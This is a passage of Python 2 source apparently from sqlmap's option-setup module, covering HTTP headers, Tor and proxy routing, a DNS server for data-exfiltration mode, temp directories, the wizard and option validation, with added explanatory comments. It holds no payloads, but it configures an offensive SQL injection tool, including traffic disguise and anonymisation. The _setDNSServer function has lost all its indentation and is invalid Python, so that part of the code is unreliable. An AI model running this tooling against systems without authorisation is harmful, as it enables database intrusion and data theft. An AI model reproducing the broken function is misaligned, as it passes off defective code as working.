        # Quirk: '_' doubles as the "append default UA" flag and the loop
        # target - after the loop it holds the last header's value (truthy
        # for non-empty values) unless a User-Agent header was found
        _ = True

        for header, _ in conf.httpHeaders:
            if header == HTTP_HEADER.USER_AGENT:
                _ = False
                break

        if _:
            conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent()))

    else:
        # --random-agent: lazily load the bundled User-Agent list once
        if not kb.userAgents:
            debugMsg = "loading random HTTP User-Agent header(s) from "
            debugMsg += "file '%s'" % paths.USER_AGENTS
            logger.debug(debugMsg)

            try:
                kb.userAgents = getFileItems(paths.USER_AGENTS)
            except IOError:
                warnMsg = "unable to read HTTP User-Agent header "
                warnMsg += "file '%s'" % paths.USER_AGENTS
                logger.warn(warnMsg)

                conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent()))
                return

        userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0]

        infoMsg = "fetched random HTTP User-Agent header from "
        infoMsg += "file '%s': '%s'" % (paths.USER_AGENTS, userAgent)
        logger.info(infoMsg)

        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))
def _setHTTPReferer():
    """
    Set the HTTP Referer
    """
    if not conf.referer:
        return

    logger.debug("setting the HTTP Referer header")
    conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
def _setHTTPHost():
    """
    Set the HTTP Host
    """
    if not conf.host:
        return

    logger.debug("setting the HTTP Host header")
    conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
def _setHTTPCookies():
    """
    Set the HTTP Cookie header
    """
    if not conf.cookie:
        return

    logger.debug("setting the HTTP Cookie header")
    conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie))
def _setHTTPTimeout():
    """
    Set the HTTP timeout
    """
    if not conf.timeout:
        # default value when '--timeout' was not provided
        conf.timeout = 30.0
    else:
        logger.debug("setting the HTTP timeout")

        value = float(conf.timeout)

        if value < 3.0:
            warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
            warnMsg += "will going to reset it"
            logger.warn(warnMsg)

            value = 3.0

        conf.timeout = value

    socket.setdefaulttimeout(conf.timeout)
def _checkDependencies():
    """
    Checks for missing dependencies.
    """
    if not conf.dependencies:
        return

    checkDependencies()
def _createTemporaryDirectory():
    """
    Creates temporary directory for this run.

    Prefers the user supplied '--tmp-dir' (verified writable via a probe
    file), otherwise validates the system temporary directory, and finally
    creates a per-run "sqlmap<pid>" subdirectory stored in kb.tempDir.
    """
    if conf.tmpDir:
        try:
            if not os.path.isdir(conf.tmpDir):
                os.makedirs(conf.tmpDir)

            # write-probe: create and remove a random file to verify access
            _ = os.path.join(conf.tmpDir, randomStr())

            open(_, "w+b").close()
            os.remove(_)

            tempfile.tempdir = conf.tmpDir

            warnMsg = "using '%s' as the temporary directory" % conf.tmpDir
            logger.warn(warnMsg)
        except (OSError, IOError), ex:
            errMsg = "there has been a problem while accessing "
            errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
            raise SqlmapSystemException, errMsg
    else:
        try:
            if not os.path.isdir(tempfile.gettempdir()):
                os.makedirs(tempfile.gettempdir())
        except (OSError, IOError, WindowsError), ex:
            # non-fatal: warn and keep going (mkdtemp below may still work)
            warnMsg = "there has been a problem while accessing "
            warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
            warnMsg += "make sure that there is enough disk space left. If problem persists, "
            warnMsg += "try to set environment variable 'TEMP' to a location "
            warnMsg += "writeable by the current user"
            logger.warn(warnMsg)

    # create a dedicated per-run directory unless one was already set up
    if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
        try:
            tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
        except (OSError, IOError, WindowsError):
            # last resort: fall back to a directory inside sqlmap's home path
            tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))

    kb.tempDir = tempfile.tempdir

    if not os.path.isdir(tempfile.tempdir):
        try:
            os.makedirs(tempfile.tempdir)
        except (OSError, IOError, WindowsError), ex:
            errMsg = "there has been a problem while setting "
            errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
            raise SqlmapSystemException, errMsg
def _cleanupOptions():
    """
    Cleanup configuration attributes.

    Normalizes raw command-line/config values in place on the 'conf'
    singleton: path expansion, list splitting, type coercion, case
    normalization and derived flags.
    """
    debugMsg = "cleaning up configuration parameters"
    logger.debug(debugMsg)

    width = getConsoleWidth()

    # progress bar width depends on whether ETA output is enabled
    if conf.eta:
        conf.progressWidth = width - 26
    else:
        conf.progressWidth = width - 46

    # expand '~' in every option that looks like a filesystem location
    for key, value in conf.items():
        if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")):
            conf[key] = safeExpandUser(value)

    if conf.testParameter:
        conf.testParameter = urldecode(conf.testParameter)
        conf.testParameter = conf.testParameter.replace(" ", "")
        conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)
    else:
        conf.testParameter = []

    if conf.agent:
        conf.agent = re.sub(r"[\r\n]", "", conf.agent)

    if conf.user:
        conf.user = conf.user.replace(" ", "")

    if conf.rParam:
        conf.rParam = conf.rParam.replace(" ", "")
        conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam)
    else:
        conf.rParam = []

    # interpret escape sequences in the parameter delimiter (e.g. "\\t")
    if conf.paramDel and '\\' in conf.paramDel:
        conf.paramDel = conf.paramDel.decode("string_escape")

    if conf.skip:
        conf.skip = conf.skip.replace(" ", "")
        conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip)
    else:
        conf.skip = []

    if conf.cookie:
        conf.cookie = re.sub(r"[\r\n]", "", conf.cookie)

    if conf.delay:
        conf.delay = float(conf.delay)

    if conf.rFile:
        conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile))

    if conf.wFile:
        conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile))

    if conf.dFile:
        conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile))

    if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"):
        conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl)

    if conf.msfPath:
        conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath))

    if conf.tmpPath:
        conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath))

    # any multi-target source implies multiple-targets mode
    if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.forms, conf.crawlDepth)):
        conf.multipleTargets = True

    if conf.optimize:
        setOptimize()

    # replace the human-readable injection mark with the internal marker char
    if conf.data:
        conf.data = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data)

    if conf.url:
        conf.url = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url)

    if conf.os:
        conf.os = conf.os.capitalize()

    if conf.dbms:
        conf.dbms = conf.dbms.capitalize()

    if conf.testFilter:
        # turn bare '*'/'+' wildcards into valid regex quantifiers ('.*'/'.+')
        conf.testFilter = conf.testFilter.strip('*+')
        conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)

        try:
            re.compile(conf.testFilter)
        except re.error:
            # fall back to a literal match when the value is not a valid regex
            conf.testFilter = re.escape(conf.testFilter)

    if conf.testSkip:
        conf.testSkip = conf.testSkip.strip('*+')
        conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)

        try:
            re.compile(conf.testSkip)
        except re.error:
            conf.testSkip = re.escape(conf.testSkip)

    if "timeSec" not in kb.explicitSettings:
        # double the time-based blind delay when going through Tor
        if conf.tor:
            conf.timeSec = 2 * conf.timeSec
            kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

            warnMsg = "increasing default value for "
            warnMsg += "option '--time-sec' to %d because " % conf.timeSec
            warnMsg += "switch '--tor' was provided"
            logger.warn(warnMsg)
    else:
        # user explicitly set --time-sec: don't auto-adjust it
        kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

    if conf.retries:
        conf.retries = min(conf.retries, MAX_CONNECT_RETRIES)

    if conf.code:
        conf.code = int(conf.code)

    if conf.csvDel:
        conf.csvDel = conf.csvDel.decode("string_escape")  # e.g. '\\t' -> '\t'

    if conf.torPort and isinstance(conf.torPort, basestring) and conf.torPort.isdigit():
        conf.torPort = int(conf.torPort)

    if conf.torType:
        conf.torType = conf.torType.upper()

    if conf.outputDir:
        paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))
        setPaths(paths.SQLMAP_ROOT_PATH)

    if conf.string:
        try:
            conf.string = conf.string.decode("unicode_escape")
        except:
            # partial fallback: only un-escape whitespace characters
            charset = string.whitespace.replace(" ", "")
            for _ in charset:
                conf.string = conf.string.replace(_.encode("string_escape"), _)

    if conf.getAll:
        map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)

    if conf.noCast:
        for _ in DUMP_REPLACEMENTS.keys():
            del DUMP_REPLACEMENTS[_]

    if conf.dumpFormat:
        conf.dumpFormat = conf.dumpFormat.upper()

    if conf.torType:
        conf.torType = conf.torType.upper()

    if conf.col:
        conf.col = re.sub(r"\s*,\s*", ',', conf.col)

    if conf.excludeCol:
        conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol)

    if conf.binaryFields:
        conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)

    # pre-connect queueing doesn't play along with proxied traffic
    if any((conf.proxy, conf.proxyFile, conf.tor)):
        conf.disablePrecon = True

    threadData = getCurrentThreadData()
    threadData.reset()
def _cleanupEnvironment():
    """
    Cleanup environment (e.g. from leftovers after --sqlmap-shell).
    """
    # undo a previous SOCKS wrapping of urllib2 (if one was applied)
    if issubclass(urllib2.socket.socket, socks.socksocket):
        socks.unwrapmodule(urllib2)

    # drop any queued pre-connected sockets left by _setSocketPreConnect()
    if hasattr(socket, "_ready"):
        socket._ready.clear()
def _dirtyPatches():
    """
    Place for "dirty" Python related patches
    """

    httplib._MAXLINE = 1 * 1024 * 1024  # accept overly long result lines (e.g. SQLi results in HTTP header responses)

    if IS_WIN:
        # conditional import with side effect: registers inet_pton() support on Windows OS
        from thirdparty.wininetpton import win_inet_pton
def _purgeOutput():
    """
    Safely removes (purges) output directory.
    """

    # Guard clause: only act when switch '--purge-output' was provided
    if not conf.purgeOutput:
        return

    purge(paths.SQLMAP_OUTPUT_PATH)
def _setConfAttributes():
    """
    This function set some needed attributes into the configuration
    singleton.
    """

    debugMsg = "initializing the configuration"
    logger.debug(debugMsg)

    # Attributes that start out unset (conf is an AttribDict, so item
    # assignment is equivalent to attribute assignment)
    for _ in ("authUsername", "authPassword", "cj", "dbmsConnector",
              "dbmsHandler", "dnsServer", "dumpPath", "hashDB", "hashDBFile",
              "hostname", "outputPath", "path", "port", "proxyList",
              "resultsFilename", "resultsFP", "scheme", "trafficFP",
              "wFileType"):
        conf[_] = None

    # Container attributes (fresh empties per run)
    conf.boundaries = []
    conf.httpHeaders = []
    conf.paramDict = {}
    conf.parameters = {}
    conf.tests = []

    # Boolean flags
    conf.ipv6 = False
    conf.multipleTargets = False
def _setKnowledgeBaseAttributes(flushAll=True):
    """
    This function set some needed attributes into the knowledge base
    singleton.

    flushAll: when False, attributes that should survive between runs
    (wordlists, tamper/WAF functions, target queue, etc.) are preserved.
    """
    debugMsg = "initializing the knowledge base"
    logger.debug(debugMsg)
    # --- generic per-run state ---
    kb.absFilePaths = set()
    kb.adjustTimeDelay = None
    kb.alerted = False
    kb.alwaysRefresh = None
    kb.arch = None
    kb.authHeader = None
    kb.bannerFp = AttribDict()
    kb.binaryField = False
    kb.browserVerification = None
    kb.brute = AttribDict({"tables": [], "columns": []})
    kb.bruteMode = False
    # --- per-run caches ---
    kb.cache = AttribDict()
    kb.cache.addrinfo = {}
    kb.cache.content = {}
    kb.cache.encoding = {}
    kb.cache.intBoundaries = None
    kb.cache.parsedDbms = {}
    kb.cache.regex = {}
    kb.cache.stdev = {}
    kb.captchaDetected = None
    # --- randomized marker characters used to delimit payload output ---
    kb.chars = AttribDict()
    kb.chars.delimiter = randomStr(length=6, lowercase=True)
    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
    kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
    kb.columnExistsChoice = None
    kb.commonOutputs = None
    kb.connErrorChoice = None
    kb.connErrorCounter = 0
    kb.cookieEncodeChoice = None
    kb.counters = {}
    kb.data = AttribDict()
    kb.dataOutputFlag = False
    # Active back-end DBMS fingerprint
    kb.dbms = None
    kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
    kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
    kb.dep = None
    kb.dnsMode = False
    kb.dnsTest = None
    kb.docRoot = None
    kb.droppingRequests = False
    kb.dumpColumns = None
    kb.dumpTable = None
    kb.dumpKeyboardInterrupt = False
    kb.dynamicMarkings = []
    kb.dynamicParameter = False
    kb.endDetection = False
    kb.explicitSettings = set()
    kb.extendTests = None
    kb.errorChunkLength = None
    kb.errorIsNone = True
    kb.falsePositives = []
    kb.fileReadMode = False
    kb.followSitemapRecursion = None
    kb.forcedDbms = None
    kb.forcePartialUnion = False
    kb.forceWhere = None
    kb.futileUnion = None
    kb.headersFp = {}
    kb.heuristicDbms = None
    kb.heuristicExtendedDbms = None
    kb.heuristicMode = False
    kb.heuristicPage = False
    kb.heuristicTest = None
    kb.hintValue = None
    kb.htmlFp = []
    kb.httpErrorCodes = {}
    kb.inferenceMode = False
    kb.ignoreCasted = None
    kb.ignoreNotFound = False
    kb.ignoreTimeout = False
    kb.injection = InjectionDict()
    kb.injections = []
    kb.laggingChecked = False
    kb.lastParserStatus = None
    # --- per-purpose locks used by the threading machinery ---
    kb.locks = AttribDict()
    for _ in ("cache", "connError", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"):
        kb.locks[_] = threading.Lock()
    kb.matchRatio = None
    kb.maxConnectionsFlag = False
    kb.mergeCookies = None
    kb.multiThreadMode = False
    kb.negativeLogic = False
    kb.nullConnection = None
    kb.oldMsf = None
    kb.orderByColumns = None
    kb.originalCode = None
    kb.originalPage = None
    kb.originalPageTime = None
    kb.originalTimeDelay = None
    kb.originalUrls = dict()
    # Back-end DBMS underlying operating system fingerprint via banner (-b)
    # parsing
    kb.os = None
    kb.osVersion = None
    kb.osSP = None
    kb.pageCompress = True
    kb.pageTemplate = None
    kb.pageTemplates = dict()
    kb.pageEncoding = DEFAULT_PAGE_ENCODING
    kb.pageStable = None
    kb.partRun = None
    kb.permissionFlag = False
    kb.postHint = None
    kb.postSpaceToPlus = False
    kb.postUrlEncode = True
    kb.prependFlag = False
    kb.processResponseCounter = 0
    kb.previousMethod = None
    kb.processUserMarks = None
    kb.proxyAuthHeader = None
    kb.queryCounter = 0
    kb.redirectChoice = None
    kb.reflectiveMechanism = True
    kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0}
    kb.requestCounter = 0
    kb.resendPostOnRedirect = None
    kb.resolutionDbms = None
    kb.responseTimes = {}
    kb.responseTimeMode = None
    kb.responseTimePayload = None
    kb.resumeValues = True
    kb.rowXmlMode = False
    kb.safeCharEncode = False
    kb.safeReq = AttribDict()
    kb.singleLogFlags = set()
    kb.skipSeqMatcher = False
    kb.reduceTests = None
    kb.tlsSNI = {}
    kb.stickyDBMS = False
    kb.stickyLevel = None
    kb.storeCrawlingChoice = None
    kb.storeHashesChoice = None
    kb.suppressResumeInfo = False
    kb.tableFrom = None
    kb.technique = None
    kb.tempDir = None
    kb.testMode = False
    kb.testOnlyCustom = False
    kb.testQueryCount = 0
    kb.testType = None
    kb.threadContinue = True
    kb.threadException = False
    kb.tableExistsChoice = None
    kb.uChar = NULL
    kb.unionDuplicates = False
    kb.xpCmdshellAvailable = False
    # --- attributes reset only on a full flush (see flushAll) ---
    if flushAll:
        kb.headerPaths = {}
        kb.keywords = set(getFileItems(paths.SQL_KEYWORDS))
        kb.passwordMgr = None
        kb.skipVulnHost = None
        kb.tamperFunctions = []
        kb.targets = oset()
        kb.testedParams = set()
        kb.userAgents = None
        kb.vainRun = True
        kb.vulnHosts = set()
        kb.wafFunctions = []
        kb.wordlists = None
def _useWizardInterface():
    """
    Presents simple wizard interface for beginner users
    """

    if not conf.wizard:
        return

    logger.info("starting wizard interface")

    while not conf.url:
        message = "Please enter full target URL (-u): "
        conf.url = readInput(message, default=None)

    # BUG FIX: original used '(conf.method if conf.method != HTTPMETHOD.GET
    # else conf.method)' - a no-op ternary that made the 'or HTTPMETHOD.POST'
    # fallback unreachable when method was GET/unset; 'else None' restores
    # the intended default of POST
    message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST)
    conf.data = readInput(message, default=None)

    # Warn (and fall back to form searching) when no testable parameter is visible
    if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
        warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST)
        warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
        if not conf.crawlDepth and not conf.forms:
            warnMsg += "Will search for forms"
            conf.forms = True
        logger.warn(warnMsg)

    # Injection difficulty -> --level/--risk values
    choice = None
    while choice is None or choice not in ("", "1", "2", "3"):
        message = "Injection difficulty (--level/--risk). Please choose:\n"
        message += "[1] Normal (default)\n[2] Medium\n[3] Hard"
        choice = readInput(message, default='1')

        if choice == '2':
            conf.risk = 2
            conf.level = 3
        elif choice == '3':
            conf.risk = 3
            conf.level = 5
        else:
            conf.risk = 1
            conf.level = 1

    # Enumeration depth -> predefined switch sets
    if not conf.getAll:
        choice = None
        while choice is None or choice not in ("", "1", "2", "3"):
            message = "Enumeration (--banner/--current-user/etc). Please choose:\n"
            message += "[1] Basic (default)\n[2] Intermediate\n[3] All"
            choice = readInput(message, default='1')

            if choice == '2':
                map(lambda x: conf.__setitem__(x, True), WIZARD.INTERMEDIATE)
            elif choice == '3':
                map(lambda x: conf.__setitem__(x, True), WIZARD.ALL)
            else:
                map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC)

    logger.debug("muting sqlmap.. it will do the magic for you")
    conf.verbose = 0

    conf.batch = True
    conf.threads = 4

    dataToStdout("\nsqlmap is running, please wait..\n\n")
def _saveConfig():
    """
    Saves the command line options to a sqlmap configuration INI file
    Format.
    """

    # Guard clause: only act when option '--save' was provided
    if not conf.saveConfig:
        return

    logger.debug("saving command line options to a sqlmap configuration INI file")

    saveConfig(conf, conf.saveConfig)

    infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig
    logger.info(infoMsg)
def setVerbosity():
    """
    This function set the verbosity of sqlmap output messages.
    """

    if conf.verbose is None:
        conf.verbose = 1

    conf.verbose = int(conf.verbose)

    # ETA mode caps verbosity at level 2 (same effect as the original
    # 'verbose > 2 and conf.eta' branch)
    if conf.verbose > 2 and conf.eta:
        conf.verbose = 2

    if conf.verbose == 0:
        logger.setLevel(logging.ERROR)
    elif conf.verbose == 1:
        logger.setLevel(logging.INFO)
    elif conf.verbose == 2:
        logger.setLevel(logging.DEBUG)
    elif conf.verbose == 3:
        logger.setLevel(CUSTOM_LOGGING.PAYLOAD)
    elif conf.verbose == 4:
        logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT)
    elif conf.verbose >= 5:
        logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN)
def _normalizeOptions(inputOptions):
    """
    Sets proper option types
    """

    # Flatten the per-group option/type mapping into one lookup table
    types_ = {}
    for group in optDict.keys():
        types_.update(optDict[group])

    # (type tag) -> (cast callable, fallback on failed conversion)
    casters = {
        OPTION_TYPE.BOOLEAN: (bool, False),
        OPTION_TYPE.INTEGER: (int, 0),
        OPTION_TYPE.FLOAT: (float, 0.0),
    }

    for key in inputOptions:
        if key not in types_:
            continue

        value = inputOptions[key]
        if value is None:
            continue

        type_ = types_[key]
        if type_ and isinstance(type_, tuple):
            type_ = type_[0]

        if type_ in casters:
            cast, fallback = casters[type_]
            try:
                value = cast(value)
            except (TypeError, ValueError):
                value = fallback

        inputOptions[key] = value
def _mergeOptions(inputOptions, overrideOptions):
    """
    Merge command line options with configuration file and default options.

    @param inputOptions: optparse object with command line options.
    @type inputOptions: C{instance}
    """

    if inputOptions.configFile:
        configFileParser(inputOptions.configFile)

    # Support both dict-like containers and optparse namespace objects
    if hasattr(inputOptions, "items"):
        pairs = inputOptions.items()
    else:
        pairs = inputOptions.__dict__.items()

    for key, value in pairs:
        if overrideOptions or key not in conf or value not in (None, False):
            conf[key] = value

    # Remember which options the user set explicitly
    if not conf.api:
        for key, value in conf.items():
            if value is not None:
                kb.explicitSettings.add(key)

    # Fill remaining holes with default values
    for key, value in defaults.items():
        if hasattr(conf, key) and conf[key] is None:
            conf[key] = value

    # Build UPPERCASE -> canonical option name lookup table
    lut = dict((_.upper(), _) for group in optDict.keys() for _ in optDict[group])

    # Pick up SQLMAP_* environment variable overrides
    envOptions = {}
    for key, value in os.environ.items():
        if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX):
            _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()
            if _ in lut:
                envOptions[lut[_]] = value

    if envOptions:
        _normalizeOptions(envOptions)
        for key, value in envOptions.items():
            conf[key] = value

    mergedOptions.update(conf)
def _setTrafficOutputFP():
    # Open the HTTP traffic log file (option '-t') for writing
    if not conf.trafficFile:
        return

    logger.info("setting file for logging HTTP traffic")
    conf.trafficFP = openFile(conf.trafficFile, "w+")
def _setDNSServer():
if not conf.dnsDomain:
return
infoMsg = "setting up DNS server instance"
logger.info(infoMsg)
isAdmin = runningAsAdmin()
if isAdmin:
try:
conf.dnsServer = DNSServer()
conf.dnsServer.run()
except socket.error, msg:
errMsg = "there was an error while setting up "
errMsg += "DNS server instance ('%s')" % msg
raise SqlmapGenericException(errMsg)
else:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to perform a DNS data exfiltration attack "
errMsg += "as it will need to listen on privileged UDP port 53 "
errMsg += "for incoming address resolution attempts"
raise SqlmapMissingPrivileges(errMsg)
def _setProxyList():
    # Load list of proxies from file provided with option '--proxy-file'
    if not conf.proxyFile:
        return

    conf.proxyList = []
    content = readCachedFileContent(conf.proxyFile)
    for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", content):
        scheme, address, port = match.group(2), match.group(3), match.group(4)
        conf.proxyList.append("%s://%s:%s" % (scheme or "http", address, port))
def _setTorProxySettings():
    if not conf.tor:
        return

    # HTTP type routes through a local Tor HTTP proxy, anything else via SOCKS
    setter = _setTorHttpProxySettings if conf.torType == PROXY_TYPE.HTTP else _setTorSocksProxySettings
    setter()
def _setTorHttpProxySettings():
    infoMsg = "setting Tor HTTP proxy settings"
    logger.info(infoMsg)

    # Probe either the user-supplied port or the well-known Tor bundle ports
    port = findLocalPort((conf.torPort,) if conf.torPort else DEFAULT_TOR_HTTP_PORTS)

    if not port:
        errMsg = "can't establish connection with the Tor HTTP proxy. "
        errMsg += "Please make sure that you have Tor (bundle) installed and setup "
        errMsg += "so you could be able to successfully use switch '--tor' "
        raise SqlmapConnectionException(errMsg)

    conf.proxy = "http://%s:%d" % (LOCALHOST, port)

    if not conf.checkTor:
        warnMsg = "use switch '--check-tor' at "
        warnMsg += "your own convenience when accessing "
        warnMsg += "Tor anonymizing network because of "
        warnMsg += "known issues with default settings of various 'bundles' "
        warnMsg += "(e.g. Vidalia)"
        logger.warn(warnMsg)
def _setTorSocksProxySettings():
    infoMsg = "setting Tor SOCKS proxy settings"
    logger.info(infoMsg)

    # Probe either the user-supplied port or the well-known Tor SOCKS ports
    port = findLocalPort((conf.torPort,) if conf.torPort else DEFAULT_TOR_SOCKS_PORTS)

    if not port:
        errMsg = "can't establish connection with the Tor SOCKS proxy. "
        errMsg += "Please make sure that you have Tor service installed and setup "
        errMsg += "so you could be able to successfully use switch '--tor' "
        raise SqlmapConnectionException(errMsg)

    # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
    proxyType = socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4
    socks.setdefaultproxy(proxyType, LOCALHOST, port)
    socks.wrapmodule(urllib2)
def _checkWebSocket():
    """
    Ensures that the third-party module 'websocket-client' is importable
    when the target URL uses a WebSocket scheme (ws:// or wss://).

    Raises SqlmapMissingDependence when the module is not available.
    """

    # tuple argument to startswith() replaces the chained 'or'
    if conf.url and conf.url.startswith(("ws:/", "wss:/")):
        try:
            from websocket import ABNF
        except ImportError:
            errMsg = "sqlmap requires third-party module 'websocket-client' "
            errMsg += "in order to use WebSocket functionality"  # fixed typo ("funcionality")
            raise SqlmapMissingDependence(errMsg)
def _checkTor():
    # Verify that traffic really goes through the Tor network (switch '--check-tor')
    if not conf.checkTor:
        return

    infoMsg = "checking Tor connection"
    logger.info(infoMsg)

    try:
        page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
    except SqlmapConnectionException:
        page = None

    # The check page congratulates properly Tor-ified visitors
    if page and 'Congratulations' in page:
        infoMsg = "Tor is properly being used"
        logger.info(infoMsg)
    else:
        errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
        raise SqlmapConnectionException(errMsg)
def _basicOptionValidation():
    """
    Checks provided options for basic sanity: value ranges and mutually
    incompatible option/switch combinations. Raises SqlmapSyntaxException
    (or SqlmapFilePathException) on the first violation found.
    """
    # --- numeric range checks ---
    if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):
        errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)"
        raise SqlmapSyntaxException(errMsg)
    if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):
        errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)"
        raise SqlmapSyntaxException(errMsg)
    if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5):
        errMsg = "value for option '--level' must be an integer value from range [1, 5]"
        raise SqlmapSyntaxException(errMsg)
    if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3):
        errMsg = "value for option '--risk' must be an integer value from range [1, 3]"
        raise SqlmapSyntaxException(errMsg)
    if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
       isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
        errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
        raise SqlmapSyntaxException(errMsg)
    if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
       isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
        errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
        raise SqlmapSyntaxException(errMsg)
    # --- mutually incompatible options/switches ---
    if conf.textOnly and conf.nullConnection:
        errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.eta and conf.verbose > defaults.verbose:
        errMsg = "switch '--eta' is incompatible with option '-v'"
        raise SqlmapSyntaxException(errMsg)
    if conf.direct and conf.url:
        errMsg = "option '-d' is incompatible with option '-u' ('--url')"
        raise SqlmapSyntaxException(errMsg)
    if conf.identifyWaf and conf.skipWaf:
        errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'"
        raise SqlmapSyntaxException(errMsg)
    if conf.titles and conf.nullConnection:
        errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.dumpTable and conf.search:
        errMsg = "switch '--dump' is incompatible with switch '--search'"
        raise SqlmapSyntaxException(errMsg)
    if conf.api and not conf.configFile:
        errMsg = "switch '--api' requires usage of option '-c'"
        raise SqlmapSyntaxException(errMsg)
    if conf.data and conf.nullConnection:
        errMsg = "option '--data' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.string and conf.nullConnection:
        errMsg = "option '--string' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.notString and conf.nullConnection:
        errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
        raise SqlmapSyntaxException(errMsg)
    if conf.noCast and conf.hexConvert:
        errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
        raise SqlmapSyntaxException(errMsg)
    if conf.dumpAll and conf.search:
        errMsg = "switch '--dump-all' is incompatible with switch '--search'"
        raise SqlmapSyntaxException(errMsg)
    if conf.string and conf.notString:
        errMsg = "option '--string' is incompatible with switch '--not-string'"
        raise SqlmapSyntaxException(errMsg)
    if conf.regexp and conf.nullConnection:
